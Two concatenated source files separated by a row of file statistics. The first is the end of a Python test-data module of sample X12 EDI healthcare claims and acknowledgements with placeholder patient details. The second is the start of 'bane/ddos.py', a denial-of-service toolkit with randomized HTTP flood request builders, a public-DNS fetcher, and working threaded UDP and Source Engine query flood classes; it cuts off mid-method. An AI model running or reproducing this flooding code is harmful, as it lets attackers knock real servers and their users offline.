GS*HC*ZZ000*ZZ001*20030828*1128*18*X*004010X098A1~
ST*837*11280001~
BHT*0019*00*121231*20050802*1202*CH~
SE*3*11280001~
GE*1*18~
GS*HP*D00111*00GR*20041028*1609*383880001*X*004010X091A1~
ST*835*0001~
SE*2*0001~
GE*1*383880001~
IEA*3*000010121~"""
},
'ordinal': {
'res997': """ISA*00* *00* *ZZ*0000BBB *ZZ*00000AAA *040809*1625*U*00401*408091625*0*P*:~
GS*FA*0BBB*0AAA*20040809*162519*1*X*004010~
ST*997*0001~
AK1*HC*1~
AK2*837*300145997~
AK5*A~
AK9*A*1*1*1~
SE*6*0001~
GE*1*1~
IEA*1*408091625~""",
'source': """ISA*00* *00* *ZZ*00000AAA *ZZ*0000BBB *040709*1439*U*00401*000484889*0*P*:~
GS*HC*0AAA*0BBB*20040709*1439*1*X*004010X096A1~
ST*837*300145997~
BHT*0019*00*300145997*20040709*1439*RP~
REF*87*004010X096A1~
NM1*41*2*PROVIDER 1*****46*0AAA~
PER*IC*HELPDESK*EM*ADMIN@NULL.NULL*TE*8005557444~
NM1*40*2*RECEIVER 1*****46*000111~
HL*1**20*1~
NM1*85*2*PROVIDER 1*****24*555112222~
N3*PROVIDER 1~
N4*THREE RIVERS*MI*49093~
REF*1D*1705555~
HL*2*1*22*0~
SBR*S*18*******11~
NM1*IL*1*ARNOLD*TOM****MI*666333444~
N3*5324 ELM~
N4*STURGIS*MI*49091~
DMG*D8*19270312*M~
REF*SY*666333444~
NM1*PR*2*PAYER 2*****PI*000111~
N3*PO BOX 0000~
N4*KALAMAZOO*MI*48001~
CLM*12522228*0***11:A:7*Y*A*Y*A*********N~
DTP*434*RD8*20031213-20031218~
DTP*435*DT*200312130800~
CL1*9*9*09~
REF*F8*12522228~
HI*BK:29689*BJ:29689~
NM1*71*1*EXTERNAL*PROVIDER*C***34*999999999~
PRV*AT*ZZ*101Y00000X~
REF*0B*9999999~
NM1*FA*2*PROVIDER 1~
PRV*RP*ZZ*101Y00000X~
N3*PROVIDER 1~
N4*THREE RIVERS*MI*49093~
SBR*T*18**PAYER A*****11~
AMT*B6*605.0000~
AMT*C4*0~
DMG*D8*19570312*M~
OI***Y***I~
NM1*IL*1*ARNOLD*TOM****MI*00000007018~
N3*5324 ELM~
N4*STURGIS*MI*49091~
NM1*PR*2*PAYER A*****PI*552312313~
DTP*573*D8*20040210~
REF*F8*1253278~
SBR*P*18**PROVIDER 1*****11~
AMT*B6*605.0000~
AMT*C4*0~
DMG*D8*19570312*M~
OI***Y***I~
NM1*IL*1*ARNOLD*TOM****MI*00000007018~
N3*5324 ELM~
N4*STURGIS*MI*49091~
NM1*PR*2*PROVIDER 1*****PI*13256235~
REF*F8*1253278~
LX*1~
SV2*0100**0*UN*5*0*0~
DTP*472*RD8*20031213-20031218~
SVD*5222312313*0**0100*5~
DTP*573*D8*20040210~
SVD*13256235*0**0100*5~
DTP*573*D8*20040210~
SE*63*300145997~
GE*1*1~
IEA*1*000484889~"""
},
'per_segment_repeat': {
'res997': """ISA*00* *00* *ZZ*RECEIVER *ZZ*SENDER *041210*0107*U*00401*412100107*0*P*:~
GS*FA*RECEIVER*SENDER*20041210*010712*56*X*004010~
ST*997*0001~
AK1*HC*56~
AK2*837*000000001~
AK3*PER*7**5~
AK5*R*5~
AK9*R*1*1*0~
SE*7*0001~
GE*1*56~
IEA*1*412100107~""",
'source': """ISA*03*SENDER *01* *ZZ*SENDER *ZZ*RECEIVER *040608*1333*U*00401*000000288*0*P*:~
GS*HC*SENDER*RECEIVER*20040608*1333*56*X*004010X098A1~
ST*837*000000001~
BHT*0019*00*289*20040608*1333*CH~
REF*87*004010X098A1~
NM1*41*2*SENDER 1*****46*2309-0923~
PER*IC*Contact Name*TE*111-555-1111~
PER*IC*Contact Name*TE*111-555-1111~
PER*IC*Contact Name*TE*111-555-1111~
NM1*40*2*Payer*****46*21312311~
HL*1**20*1~
NM1*85*2*Biller 1*****XX*2309-2222~
N3*1123 MILL~
N4*VOID*MI*49002~
PER*IC*Contact Name*TE*111-555-2222~
HL*2*1*22*0~
SBR*P*18*******11~
NM1*IL*1*GAIMAN*NEIL*M***MI*101911111~
N3*1123 OAKLAND~
N4*VOID*MI*49001~
DMG*D8*19460101*M~
REF*SY*370600000~
NM1*PR*2*PAYER 1*****PI*44-4444444~
N3*4444 ONE RD~
N4*VOID*MI*49001~
CLM*6643-1019AA*999.6***12::1*Y*A*N*Y*B~
HI*BK:29590~
LX*1~
SV1*HC:H2015*14.84*UN*6***1~
DTP*472*D8*20040501~
REF*6R*AKLKJ124231AD~
SE*30*000000001~
GE*1*56~
IEA*1*000000288~"""
},
'repeat_init_segment':
{
'res997': """ISA*00* *00* *ZZ*111111960 *ZZ*111111536 *070829*1105*U*00401*708291105*0*T*:~
GS*FA*111111960*111111536*20070829*110552*1*X*004010~
ST*997*0001~
AK1*HS*1~
AK2*270*0001~
AK5*A~
AK9*A*1*1*1~
SE*6*0001~
GE*1*1~
IEA*1*708291105~""",
'source': """ISA*00* *00* *ZZ*111111536 *ZZ*111111960 *000816*2105*U*00401*000168037*0*T*:~
GS*HS*111111536*111111960*20070816*2105*1*X*004010X092A1~
ST*270*0001~
BHT*0022*13*1764*20070816*2105~
HL*1**20*1~
NM1*PR*2*TEST PAYER*****PI*100111~
HL*2*1*21*1~
NM1*1P*2*test*****SV*111111111~
HL*3*2*22*0~
TRN*1*1764*9174458207*test~
NM1*IL*1*Blok*Ingrid****MI*00111111~
REF*SY*382111111~
DMG*D8*19950111~
DTP*472*D8*20070801~
EQ*30**IND~
EQ*30**CHD~
SE*15*0001~
GE*1*1~
IEA*1*000168037~"""
},
'simple1':
{
'res997': """ISA*00* *00* *ZZ*ZZ001 *ZZ*ZZ000 *040701*1611*U*00401*407011611*0*T*:~
GS*FA*ZZ001*ZZ000*20040701*161145*17*X*004010~
ST*997*0001~
AK1*HC*17~
AK2*837*11280001~
AK3*BHT*1**3~
AK3*HL*1**3~
AK5*R*5~
AK9*R*1*1*0~
SE*8*0001~
GE*1*17~
IEA*1*407011611~""",
'source': """ISA*00* *00* *ZZ*ZZ000 *ZZ*ZZ001 *030828*1128*U*00401*000010121*0*T*:~
GS*HC*ZZ000*ZZ001*20030828*1128*17*X*004010X098A1~
ST*837*11280001~
SE*2*11280001~
GE*1*17~
IEA*1*000010121~"""
},
'simple_837p': {
'res997': """ISA*00* *00* *ZZ*BBBBBBBBB *ZZ*AAAAAAAA *081117*1543*U*00401*811171543*1*P*:~
GS*FA*BBBBBBBBB*AAAA*20081117*154310*1167*X*004010~
ST*997*0001~
AK1*HC*1167~
AK2*837*1179~
AK5*A~
AK9*A*1*1*1~
SE*6*0001~
GE*1*1167~
TA1*000001168*041105*1526*A*000~
IEA*1*811171543~""",
'source': """ISA*00* *00* *ZZ*AAAAAAAA *ZZ*BBBBBBBBB *041105*1526*U*00401*000001168*1*P*:~
GS*HC*AAAA*BBBBBBBBB*20041105*1526*1167*X*004010X098A1~
ST*837*1179~
BHT*0019*00*AAAA1179*20041105*1526*RP~
REF*87*004010X098A1~
NM1*41*2*Sender 1*****46*99999~
PER*IC*SUPPORT*EM*Support@dev.null*TE*8005553333~
NM1*40*2*Receiver 1*****46*8888888~
HL*1**20*1~
NM1*85*2*Sender 1*****24*999999999~
N3*399 ELM ROAD~
N4*Kalamazoo*MI*49001~
REF*1D*333402169~
HL*2*1*22*0~
SBR*P*18*******MC~
NM1*IL*1*THE FIFTH*RICHARD****MI*1212121~
N3*156 ELM~
N4*KALAMAZOO*MI*49001~
DMG*D8*19051104*M~
NM1*PR*2*PAYER 1*****PI*8888888~
CLM*3215338*21***12::1*Y*A*Y*A*B~
CN1*05~
HI*BK:317~
NM1*82*2*PROVIDER 1*****24*222185735~
PRV*PE*ZZ*103T00000X~
SBR*P*18***MC****MC~
AMT*B6*0~
DMG*D8*19051104*M~
OI***Y*B**I~
NM1*IL*1*THE FIFTH*RICHARD****MI*0000000004~
N3*156 ELM~
N4*KALAMAZOO*MI*49001~
REF*SY*777777777~
NM1*PR*2*Sender 1S*****PI*12128909~
REF*F8*3215338~
REF*G1*121282~
LX*1~
SV1*HC:H2015:TT*21*UN*12***1~
DTP*472*D8*20040407~
REF*6R*1057296~
AMT*AAE*21~
SVD*174456543*21*HC:H2015:TT**12~
DTP*573*D8*20040929~
LX*2~
SV1*HC:H2015:TT*21*UN*12***1~
DTP*472*D8*20040414~
REF*6R*1057297~
AMT*AAE*21~
SVD*174456543*21*HC:H2015:TT**12~
DTP*573*D8*20040929~
CLM*5555*21***12::1*Y*A*Y*A*B~
HI*BK:317~
LX*1~
SV1*HC:H2015:TT*21*UN*12***1~
DTP*472*D8*20040407~
REF*6R*1057296~
LX*2~
SV1*HC:H2015:TT*21*UN*12***1~
DTP*472*D8*20040414~
REF*6R*1057297~
LX*3~
SV1*HC:H2017:TT*1*UN*12***1~
DTP*472*D8*20050414~
REF*6R*105797~
SE*63*1179~
GE*1*1167~
IEA*1*000001168~"""
},
'simple_837i': {'source':
"""ISA*00* *00* *ZZ*00000AAA *ZZ*0000BBB *040709*1439*U*00401*000484889*0*P*:~
GS*HC*0AAA*0BBB*20040709*1439*1*X*004010X096A1~
ST*837*300145997~
BHT*0019*00*300145997*20040709*1439*RP~
REF*87*004010X096A1~
NM1*41*2*PROVIDER 1*****46*0AAA~
PER*IC*HELPDESK*EM*ADMIN@NULL.NULL*TE*8005557444~
NM1*40*2*RECEIVER 1*****46*000111~
HL*1**20*1~
NM1*85*2*PROVIDER 1*****24*555112222~
N3*PROVIDER 1~
N4*THREE RIVERS*MI*49093~
REF*1D*1705555~
HL*2*1*22*0~
SBR*S*18*******11~
NM1*IL*1*ARNOLD*TOM****MI*666333444~
N3*5324 ELM~
N4*STURGIS*MI*49091~
DMG*D8*19270312*M~
REF*SY*666333444~
NM1*PR*2*PAYER 2*****PI*000111~
N3*PO BOX 0000~
N4*KALAMAZOO*MI*48001~
CLM*12522228*0***11:A:7*Y*A*Y*A*********N~
DTP*434*RD8*20031213-20031218~
DTP*435*DT*200312130800~
CL1*9*9*09~
REF*F8*12522228~
HI*BK:29689*BJ:29689~
NM1*71*1*EXTERNAL*PROVIDER*C***34*999999999~
PRV*AT*ZZ*101Y00000X~
REF*0B*9999999~
NM1*FA*2*PROVIDER 1~
PRV*RP*ZZ*101Y00000X~
N3*PROVIDER 1~
N4*THREE RIVERS*MI*49093~
SBR*T*18**PAYER A*****11~
AMT*B6*605.0000~
AMT*C4*0~
DMG*D8*19570312*M~
OI***Y***I~
NM1*IL*1*ARNOLD*TOM****MI*00000007018~
N3*5324 ELM~
N4*STURGIS*MI*49091~
NM1*PR*2*PAYER A*****PI*552312313~
DTP*573*D8*20040210~
REF*F8*1253278~
SBR*P*18**PROVIDER 1*****11~
AMT*B6*605.0000~
AMT*C4*0~
DMG*D8*19570312*M~
OI***Y***I~
NM1*IL*1*ARNOLD*TOM****MI*00000007018~
N3*5324 ELM~
N4*STURGIS*MI*49091~
NM1*PR*2*PROVIDER 1*****PI*13256235~
REF*F8*1253278~
LX*1~
SV2*0100**0*UN*5*0*0~
DTP*472*RD8*20031213-20031218~
SVD*5222312313*0**0100*5~
DTP*573*D8*20040210~
SVD*13256235*0**0100*5~
DTP*573*D8*20040210~
LX*2~
SV2*0101**0*UN*5*0*0~
DTP*472*RD8*20031214-20031218~
SVD*5222312313*0**0100*5~
DTP*573*D8*20040210~
SVD*13256235*0**0100*5~
DTP*573*D8*20040210~
LX*3~
SV2*0102**0*UN*5*0*0~
DTP*472*RD8*20031212-20031218~
SVD*5222312313*0**0100*5~
DTP*573*D8*20040210~
SVD*13256235*0**0100*5~
DTP*573*D8*20040210~
CLM*12522229*0***11:A:7*Y*A*Y*A*********N~
DTP*434*RD8*20031213-20031218~
DTP*435*DT*200312130800~
CL1*9*9*09~
REF*F8*12522228~
HI*BK:29689*BJ:29689~
NM1*71*1*EXTERNAL*PROVIDER*C***34*999999999~
PRV*AT*ZZ*101Y00000X~
REF*0B*9999999~
NM1*FA*2*PROVIDER 1~
PRV*RP*ZZ*101Y00000X~
N3*PROVIDER 1~
N4*THREE RIVERS*MI*49093~
SBR*T*18**PAYER A*****11~
AMT*B6*605.0000~
AMT*C4*0~
DMG*D8*19570312*M~
OI***Y***I~
NM1*IL*1*ARNOLD*TOM****MI*00000007018~
N3*5324 ELM~
N4*STURGIS*MI*49091~
NM1*PR*2*PAYER A*****PI*552312313~
DTP*573*D8*20040210~
REF*F8*1253278~
SBR*P*18**PROVIDER 1*****11~
AMT*B6*605.0000~
AMT*C4*0~
DMG*D8*19570312*M~
OI***Y***I~
NM1*IL*1*ARNOLD*TOM****MI*00000007018~
N3*5324 ELM~
N4*STURGIS*MI*49091~
NM1*PR*2*PROVIDER 1*****PI*13256235~
REF*F8*1253278~
LX*1~
SV2*0103**0*UN*5*0*0~
DTP*472*RD8*20031213-20031218~
SVD*5222312313*0**0100*5~
DTP*573*D8*20040210~
SVD*13256235*0**0100*5~
DTP*573*D8*20040210~
LX*2~
SV2*0104**0*UN*5*0*0~
DTP*472*RD8*20031214-20031218~
SVD*5222312313*0**0100*5~
DTP*573*D8*20040210~
SVD*13256235*0**0100*5~
DTP*573*D8*20040210~
LX*3~
SV2*0105**0*UN*5*0*0~
DTP*472*RD8*20031212-20031218~
SVD*5222312313*0**0100*5~
DTP*573*D8*20040210~
SVD*13256235*0**0100*5~
DTP*573*D8*20040210~
SE*132*300145997~
GE*1*1~
IEA*1*000484889~"""
},
'834_lui_id_5010': {
'source': """ISA*00* *00* *ZZ*D00XXX *ZZ*00AA *070305*1832*U*00501*000701336*0*P*:~
GS*BE*D00XXX*00AA*20070305*1832*13360001*X*005010X220A1~
ST*834*0001*005010X220A1~
BGN*00*88880070301 00*20070305*181245****4~
DTP*007*D8*20070301~
N1*P5*PAYER 1*FI*999999999~
N1*IN*KCMHSAS*FI*999999999~
INS*Y*18*030*XN*A*C**FT~
REF*0F*00389999~
REF*1L*000003409999~
REF*3H*K129999A~
DTP*356*D8*20070301~
NM1*IL*1*DOE*JOHN*A***34*999999999~
N3*777 ELM ST~
N4*ALLEGAN*MI*49010**CY*03~
DMG*D8*19670330*M**O~
LUI***ESSPANISH~
HD*030**AK*064703*IND~
DTP*348*D8*20070301~
AMT*P3*45.34~
REF*17*E 1F~
SE*20*0001~
GE*1*13360001~
IEA*1*000701336~
""",
'resAck': """ISA*00* *00* *ZZ*00GR *ZZ*D00111 *070320*1721*U*00501*703201721*0*P*:~
GS*FA*00GR*D00111*20070320*172121*13360001*X*005010X231~
ST*997*0001*005010X231~
AK1*BE*13360001*005010X220A1~
AK2*834*0001*005010X220A1~
IK5*A~
AK9*A*1*1*1~
SE*6*0001~
GE*1*13360001~
IEA*1*703201721~
"""},
'834_eol_in_element': {
'source': """ISA*00* *00* *ZZ*D00XXX *ZZ*00AA *070305*1832*U*00501*000701336*0*P*:~
GS*BE*D00XXX*00AA*20070305*1832*13360001*X*005010X220A1~
ST*834*0001*005010X220A1~
BGN*00*88880070301 00*20070305*181245****4~
DTP*007*D8*20070301~
N1*P5*PAYER 1*FI*999999999~
N1*IN*KCMHSAS*FI*999999999~
INS*Y*18*030*XN*A*C**FT~
REF*0F*00389999~
REF*1L*000003409999~
REF*3H*K129999A~
DTP*356*D8*20070301~
NM1*IL*1*DOE*JOHN*A***34*999999999~
N3*777 ELM ST
APT 55~
N4*ALLEGAN*MI*49010**CY*03~
DMG*D8*19670330*M**O~
LUI***ESSPANISH~
HD*030**AK*064703*IND~
DTP*348*D8*20070301~
AMT*P3*45.34~
REF*17*E 1F~
SE*20*0001~
GE*1*13360001~
IEA*1*000701336~
""",
'resAck': """ISA*00* *00* *ZZ*00AA *ZZ*D00XXX *131107*1503*^*00501*311071503*0*P*:~
GS*FA*00AA*D00XXX*20131107*150355*608852007*X*005010X231~
ST*999*0001*005010X231~
AK1*BE*13360001*005010X220A1~
AK2*834*0001*005010X220A1~
IK3*N3*12**8~
IK4*1*166*6*<LF>~
IK5*R*5~
AK9*R*1*1*0~
SE*8*0001~
GE*1*608852007~
IEA*1*311071503~
"""},
}
if __name__ == '__main__':
import os.path
for k in datafiles:
if 'source' in datafiles[k]:
with open(os.path.join('files', k + '.txt'), 'w') as f:
f.write(datafiles[k]['source'])
| 22.935223 | 127 | 0.671197 | 10,226 | 50,985 | 3.343145 | 0.074223 | 0.04607 | 0.058443 | 0.030538 | 0.889432 | 0.883143 | 0.870243 | 0.862755 | 0.849709 | 0.843362 | 0 | 0.450262 | 0.094989 | 50,985 | 2,222 | 128 | 22.945545 | 0.290646 | 0 | 0 | 0.854197 | 0 | 0.026379 | 0.969003 | 0.38294 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.00048 | 0 | 0.00048 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 10 |
bd0125900a44b3823c4881f38a04fe8a1d52cda6 | 67 | py | Python | PW_explorer/Custom_Distance_Functions/dummy_dist_func.py | idaks/PW-explorer | 2ea90722924ed2c0a04805f1588f304affc36354 | [
"Apache-2.0"
] | 15 | 2017-07-11T13:34:22.000Z | 2021-08-16T12:32:51.000Z | PW_explorer/Custom_Distance_Functions/dummy_dist_func.py | idaks/PW-explorer | 2ea90722924ed2c0a04805f1588f304affc36354 | [
"Apache-2.0"
] | 34 | 2018-10-26T14:39:47.000Z | 2020-08-03T12:19:26.000Z | PW_explorer/Custom_Distance_Functions/dummy_dist_func.py | idaks/PW-explorer | 2ea90722924ed2c0a04805f1588f304affc36354 | [
"Apache-2.0"
] | 1 | 2017-08-09T05:04:56.000Z | 2017-08-09T05:04:56.000Z | def dist(pw_id_1, pw_id_2, **kwargs):
return pw_id_1 - pw_id_2
| 22.333333 | 37 | 0.701493 | 16 | 67 | 2.4375 | 0.5 | 0.410256 | 0.25641 | 0.358974 | 0.512821 | 0.512821 | 0 | 0 | 0 | 0 | 0 | 0.072727 | 0.179104 | 67 | 2 | 38 | 33.5 | 0.636364 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.5 | false | 0 | 0 | 0.5 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 8 |
bd3dac22666d5700d0d5f8bfb0ebbb8610488f5f | 50,586 | py | Python | bane/ddos.py | AlaBouali/BANEokey | 18160d406b214ff7647d7fd33e59d67b3e2e5a06 | [
"MIT"
] | null | null | null | bane/ddos.py | AlaBouali/BANEokey | 18160d406b214ff7647d7fd33e59d67b3e2e5a06 | [
"MIT"
] | null | null | null | bane/ddos.py | AlaBouali/BANEokey | 18160d406b214ff7647d7fd33e59d67b3e2e5a06 | [
"MIT"
] | null | null | null | import requests, cfscrape, socks, os, sys, urllib, socket, random, time, threading, ssl
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
# import the dependencies for each python version
if sys.version_info < (3, 0):
# Python 2.x
import httplib
import urllib2
from scapy.config import conf
conf.ipv6_enabled = False
from scapy.all import *
else:
# Python 3.x
import http.client
httplib = http.client
import urllib.request
urllib2 = urllib.request
from kamene.config import conf
conf.ipv6_enabled = False
from kamene.all import *
from struct import *
from bane.iot import getip
from bane.payloads import *
from bane.proxer import *
# Platform detection.  Both flags are initialized to False so the check
# below cannot raise NameError on non-Android systems (previously they
# were only assigned inside the Android branch, which crashed the import
# everywhere else).
adr = False  # True when the device is an android
termux = False  # True when the application which runs the module is Termux
if os.path.isdir("/data/data") == True:
    adr = True
    if os.path.isdir("/data/data/com.termux/") == True:
        termux = True
if (termux == False) or (adr == False):
    from bane.swtch import *
def reorder_headers_randomly(s):
    """Return the raw HTTP request *s* with its header lines shuffled.

    The request line stays first and the body (after the blank line) is
    untouched; only the order of the header lines is randomized, which
    helps evade trivial signature-based filtering.
    """
    sections = s.split("\r\n\r\n")
    head = sections[0]
    body = sections[1]
    head_lines = head.split("\r\n")
    request_line = head_lines[0]
    headers = head_lines[1:]
    random.shuffle(headers)
    return request_line + "\r\n" + "\r\n".join(headers) + "\r\n\r\n" + body
def random_param():
    """Return a random URL-parameter fragment.

    With equal probability, either the decimal string of a number in
    1..1000 or a single random character from the module-level ``lis``
    pool (imported from bane.payloads).
    """
    if random.randint(1, 2) == 1:
        return str(random.randint(1, 1000))
    return random.choice(lis)
def setup_http_packet(
    target,
    ty,
    paths,
    post_field_min,
    post_field_max,
    post_min,
    post_max,
    cookie,
    user_agents,
):
    """Build a randomized raw HTTP/1.1 request string aimed at *target*.

    ty: 1 builds a GET request, any other value builds a POST request.
    paths: candidate request paths; one is picked at random.
    post_field_min / post_field_max: length bounds for the POST field name.
    post_min / post_max: length bounds for the POST field value.
    cookie: optional Cookie header value (header omitted when falsy).
    user_agents: pool of User-Agent strings to pick from.

    The finished request has its headers shuffled by
    reorder_headers_randomly().  The pools a/ac/al/cc/ec/lis/referers are
    module-level lists imported from bane.payloads.
    """
    pa = random.choice(paths)  # bypassing cache engine
    # build a random query-string key...
    q = ""
    for i in range(random.randint(2, 5)):
        q += random_param() + random_param()
    # ...and a random query-string value
    p = ""
    for i in range(random.randint(2, 5)):
        p += random_param() + random_param()
    # append with "&" if the path already has a query string, else "?"
    if "?" in pa:
        jo = "&"
    else:
        jo = "?"
    pa += jo + q + "=" + p
    # setting random headers: pick an Accept-Encoding value, sometimes
    # extending it with a second, different encoding token
    # NOTE(review): each loop iteration overwrites "ed", so only the last
    # iteration's value survives — confirm the loop is intentional
    for l in range(random.randint(1, 5)):
        ed = random.choice(ec)
        oi = random.randint(1, 3)
        if oi == 2:
            gy = 0
            while gy < 1:
                df = random.choice(ec)
                if df != ed:
                    gy += 1
                    ed += ", "
                    ed += df
    # random Accept-Language value with 0-5 extra weighted entries
    l = random.choice(al)
    for n in range(random.randint(0, 5)):
        l += ";q={},".format(round(random.uniform(0.1, 1), 1)) + random.choice(al)
    kl = random.randint(1, 2)  # NOTE(review): unused — confirm it can be dropped
    ck = ""
    if cookie:
        ck = "Cookie: " + cookie + "\r\n"
    if ty == 1:
        # GET request with fully randomized header values and a random
        # spoofed Referer (search-engine URL + random token)
        m = "GET {} HTTP/1.1\r\n{}User-Agent: {}\r\nAccept: {}\r\nAccept-Language: {}\r\nAccept-Encoding: {}\r\nAccept-Charset: {}\r\nKeep-Alive: {}\r\nConnection: Keep-Alive\r\nCache-Control: {}\r\nReferer: {}\r\nHost: {}\r\n\r\n".format(
            pa,
            ck,
            random.choice(user_agents),
            random.choice(a),
            l,
            ed,
            random.choice(ac),
            random.randint(100, 1000),
            random.choice(cc),
            (
                random.choice(referers)
                + random.choice(lis)
                + str(random.randint(0, 100000000))
                + random.choice(lis)
            ),
            target,
        )
    else:
        # POST request: random form field name (k) and value (j) within
        # the caller-supplied length bounds
        k = ""
        for _ in range(random.randint(post_field_min, post_field_max)):
            k += random.choice(lis)
        j = ""
        for x in range(random.randint(post_min, post_max)):
            j += random.choice(lis)
        par = k + "=" + j
        m = "POST {} HTTP/1.1\r\n{}User-Agent: {}\r\nAccept-language: {}\r\nConnection: keep-alive\r\nKeep-Alive: {}\r\nContent-Length: {}\r\nContent-Type: application/x-www-form-urlencoded\r\nReferer: {}\r\nHost: {}\r\n\r\n{}".format(
            pa,
            ck,
            random.choice(user_agents),
            l,
            random.randint(300, 1000),
            len(par),
            (
                random.choice(referers)
                + random.choice(lis)
                + str(random.randint(0, 100000000))
                + random.choice(lis)
            ),
            target,
            par,
        )
    return reorder_headers_randomly(m)
def get_public_dns(timeout=15):
    """Fetch the list of public DNS resolvers from public-dns.info.

    timeout: HTTP request timeout in seconds.

    Returns one entry per line of the remote text file (the trailing
    newline yields a final empty string, which callers appear to expect),
    or an empty list when the request fails.
    """
    try:
        return (
            requests.get(
                "https://public-dns.info/nameservers.txt", timeout=timeout
            ).text
        ).split("\n")
    except Exception:
        # narrowed from a bare "except:" so KeyboardInterrupt / SystemExit
        # still propagate; any request failure yields an empty list
        return []
def reset():
    """Reset every module-level attack flag/counter to its initial value."""
    defaults = {
        "counter": 0,
        "stop": False,
        "coo": False,
        "ual": [],
        "flag": -1,
        "ier": 0,
        "pointer": 0,
        "ue": [],
    }
    globals().update(defaults)
"""
The following classes simulate DoS attacks with different tools. Some were
originally written in other languages (Perl: slowloris; C: xerxes, the slow-read
attack, ...) and have been rewritten in Python; others are Python tools that serve
as proofs of concept for certain vulnerabilities (slow POST attacks, HULK), with
modifications that have improved their performance!!!
"""
class udp_flood:
    """Flood a host with UDP datagrams carrying random printable payloads.

    Worker threads are spawned by the constructor and keep sending until
    ``duration`` seconds elapse or ``kill()`` is called.  ``counter``
    tracks the datagrams sent across all threads.
    """

    def __init__(
        self,
        u,
        p=80,
        threads_daemon=True,
        interval=0.001,
        min_size=10,
        max_size=10,
        connection=True,
        duration=60,
        threads=1,
        limiting=True,
        logs=False,
    ):
        """Start the flood.

        u: target host/IP.
        p: target UDP port.
        threads_daemon: run workers as daemon threads.
        interval: pause between datagrams (applied when limiting=True).
        min_size / max_size: payload length bounds (hard-capped at 1400).
        connection: "connect" the UDP socket before sending.
        duration: hard time limit in seconds for the whole attack.
        threads: number of worker threads.
        limiting: rate-limit sends with ``interval``.
        logs: print live packets/bytes statistics to stdout.
        """
        self.target = u
        self.port = p
        self.interval = interval
        self.min_size = min_size
        self.max_size = max_size
        self.connection = connection
        self.duration = duration
        self.limiting = limiting
        self.logs = logs
        self.stop = False
        self.counter = 0
        self.start = time.time()
        for x in range(threads):
            try:
                t = threading.Thread(target=self.attack)
                t.daemon = threads_daemon
                t.start()
            except:
                pass

    def attack(self):
        """Worker loop: send random UDP payloads until stopped or timed out."""
        try:
            time.sleep(1)  # give time for all threads to be created
            tm = time.time()
            size = 0  # bytes sent during the current 1-second window
            while True:
                if (
                    int(time.time() - self.start) >= self.duration
                ):  # this is a safety mechanism so the attack won't run forever
                    break
                if self.stop == True:
                    break
                try:
                    s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
                    if self.connection == True:
                        s.connect((self.target, self.port))
                    msg = ""
                    for x in range(random.randint(self.min_size, self.max_size)):
                        msg += random.choice(lis)
                    if len(msg) > 1400:
                        msg = msg[
                            0:1400
                        ]  # make sure all payloads' sizes are on the right range
                    s.sendto((msg.encode("utf-8")), (self.target, self.port))
                    size += len(msg)
                    self.counter += 1
                    if (self.logs == True) and (int(time.time() - tm) == 1):
                        sys.stdout.write(
                            "\rPackets: {} | Bytes/s: {} ".format(self.counter, size)
                        )
                        sys.stdout.flush()
                        tm = time.time()
                        size = 0
                    if self.limiting == True:
                        time.sleep(self.interval)
                except:
                    try:
                        time.sleep(self.interval)
                    except:
                        pass
            self.kill()
        except:
            pass

    def done(self):
        """Return True once the attack has been torn down by kill()."""
        if "stop" in dir(self):
            return False
        return True

    def reset(self):
        """Null out then delete every attribute; running threads hit an
        AttributeError on their next access and die via their except blocks."""
        l = []
        for x in self.__dict__:
            self.__dict__[x] = None
            l.append(x)
        for x in l:
            delattr(self, x)

    def kill(self):
        """Stop the attack and return the packet count (None if already stopped).

        Guarded so that concurrent calls — every worker calls kill() when the
        duration expires, and the user may call it too — no longer raise once
        reset() has stripped the attributes.
        """
        if "stop" not in dir(self):
            return None  # already killed
        self.stop = True
        a = self.counter
        self.reset()  # kills any running threads instantly (state becomes unreadable)
        return a
class vse_flood:
    """Flood a game server with the Valve Source Engine info query.

    Each worker thread repeatedly sends the fixed "TSource Engine Query"
    datagram to the target — a classic resource-exhaustion payload for
    Source-engine game servers.
    """

    def __init__(
        self,
        u,
        p=80,
        threads_daemon=True,
        interval=0.001,
        connection=True,
        duration=60,
        threads=1,
        limiting=True,
        logs=False,
    ):
        # u: target host/IP; p: target UDP port.
        # threads_daemon: run workers as daemon threads.
        # interval: pause between datagrams (applied when limiting=True).
        # connection: "connect" the UDP socket before sending.
        # duration: hard time limit in seconds for the whole attack.
        # threads: number of worker threads.
        # logs: print a live packet counter to stdout.
        self.target = u
        self.port = p
        self.payload = b"\xff\xff\xff\xffTSource Engine Query\x00"  # read more at https://developer.valvesoftware.com/wiki/Server_queries
        self.interval = interval
        self.connection = connection
        self.duration = duration
        self.limiting = limiting
        self.logs = logs
        self.stop = False  # cooperative stop flag checked by the workers
        self.counter = 0  # datagrams sent across all threads
        self.start = time.time()
        for x in range(threads):
            try:
                t = threading.Thread(target=self.attack)
                t.daemon = threads_daemon
                t.start()
            except:
                pass

    def attack(self):
        # Worker loop: send the VSE query until stopped or timed out.
        try:
            time.sleep(1)  # give time for all threads to be created
            tm = time.time()
            while True:
                if (
                    int(time.time() - self.start) >= self.duration
                ):  # this is a safety mechanism so the attack won't run forever
                    break
                if self.stop == True:
                    break
                try:
                    s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
                    if self.connection == True:
                        s.connect((self.target, self.port))
                    s.sendto(self.payload, (self.target, self.port))
                    self.counter += 1
                    if (self.logs == True) and (int(time.time() - tm) == 1):
                        sys.stdout.write("\rPackets: {} ".format(self.counter))
                        sys.stdout.flush()
                        tm = time.time()
                    if self.limiting == True:
                        time.sleep(self.interval)
                except:
                    pass
                # NOTE(review): this second pause runs every iteration even
                # when limiting is False — confirm it is intentional
                try:
